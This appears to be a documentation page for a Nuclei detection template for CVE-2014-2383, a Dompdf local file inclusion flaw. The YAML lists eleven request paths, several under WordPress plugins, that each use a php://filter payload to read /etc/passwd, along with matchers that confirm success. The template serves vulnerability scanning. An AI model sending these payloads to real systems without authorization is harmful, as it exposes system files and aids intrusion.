Dompdf < v0.6.0 - Local File Inclusion
ID: CVE-2014-2383
Severity: medium
Author: 0x_Akoko,akincibor,ritikchaddha
Tags: cve2014,cve,lfi,wp-plugin,wpscan,dompdf,wordpress,wp,edb,seclists
Description
Section titled “Description”A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter.
YAML Source
Section titled “YAML Source”id: CVE-2014-2383
info: name: Dompdf < v0.6.0 - Local File Inclusion author: 0x_Akoko,akincibor,ritikchaddha severity: medium description: | A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter. impact: | The vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the affected system. remediation: | Upgrade Dompdf to a version higher than v0.6.0 to mitigate the vulnerability. reference: - https://www.exploit-db.com/exploits/33004 - http://seclists.org/fulldisclosure/2014/Apr/258 - https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2383/ - https://wpscan.com/vulnerability/1d64d0cb-6b71-47bb-8807-7c8350922582 - https://nvd.nist.gov/vuln/detail/CVE-2014-2383 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2014-2383 cwe-id: CWE-200 epss-score: 0.00363 epss-percentile: 0.72296 cpe: cpe:2.3:a:dompdf:dompdf:*:beta3:*:*:*:*:*:* metadata: verified: true max-request: 11 vendor: dompdf product: dompdf tags: cve2014,cve,lfi,wp-plugin,wpscan,dompdf,wordpress,wp,edb,seclists
http: - method: GET path: - "{{BaseURL}}{{paths}}"
payloads: paths: - "/dompdf.php?input_file=php://filter/resource=/etc/passwd" - "/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd" - "/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" - "/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" - "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" - "/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" - "/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd" - "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" - "/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" - "/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" - "/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
stop-at-first-match: true
matchers-condition: and matchers: - type: word part: header words: - "application/pdf" - 'filename="dompdf_out.pdf"' condition: and
- type: regex regex: - "root:[x*]:0:0"
- type: status status: - 200# digest: 490a0046304402207ff960fb551b91409d81fd8e8c44673efbc4e06f838d5e8849b47738c34b454102204542e3883e7011f23093d67eec15aaefdb4e1a11c91a60a9a98ec3abd1b8e1f2:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2014/CVE-2014-2383.yaml"